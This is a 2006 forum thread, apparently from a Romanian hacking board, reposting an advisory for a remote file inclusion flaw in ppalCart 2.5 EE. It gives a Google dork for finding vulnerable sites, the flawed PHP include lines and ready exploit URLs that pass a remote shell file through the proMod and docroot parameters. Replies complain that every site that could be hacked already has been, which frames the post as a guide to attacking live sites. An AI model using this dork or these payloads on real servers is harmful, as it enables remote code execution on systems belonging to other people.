zRR Posted September 7, 2006 Report Share Posted September 7, 2006 google dork :"powered by: profitCode"exploite:http:///index.php?proMod=http://shell.txt?discoverde by momo26 !!!!!!!!!!!!!!!+--------------------------------------------------------------------++ ppalCart V(2.5 EE) Remote File Inclusion++-------------------------------------------------------------------++ Affected Software .: Software+ Version .............: ppalCart 2.5 EE+ Venedor ...........: http://www.profitcode.com+ Class .............: Remote File Inclusion+ Risk ..............: high (Remote File Execution)+ Found by ..........: momo26+ Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB+ Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673++--------------------------------------------------------------------+--------------------------------------------------------------------+ ./index Directory ...+ [index.php]++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include $docroot . "js/css/shop-custom.php";+include $docroot . "js/css/shop-default.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 50 - 349++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+else if($proMod) {+include "$proMod" . ".php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 288 - 349+Ex --> http://www.victom.com/index.php?proMod=htt...com/r0x.txt?cmd++-------------------------------------------------------------------+-------------------------------------------------------------------+ [mainpage.php]++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" .".php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 158 - 308++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "tplates/newitems.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 284 - 308++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "tplates/specials.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 287 - 308++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "cstmincs/cstmbanner$langFile.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 290 - 308++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "tplates/upselladvert.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 292 - 308++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+include "$docroot" . "mainincs/upsellproducts.php";+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~++Line --> 298 - 308+Ex --> http://www.victom.com/mainpage.php?docroot...com/r0x.txt?cmd++--------------------------------------------------------------------+Eddy_BAck0o ;+--------------------------------------------------------------------# milw0rm.com [2006-09-07]Succes Quote Link to comment Share on other sites More sharing options...
Thunder Posted September 7, 2006 Report Share Posted September 7, 2006 Faina vulnerabilitatea , doar ca toate siteurile ce puteau fi hackerite au fost deja Quote Link to comment Share on other sites More sharing options...
zRR Posted September 7, 2006 Author Report Share Posted September 7, 2006 Am vazut si eu ........Sa`u miscat alte nationalitati mai repede ca noi Quote Link to comment Share on other sites More sharing options...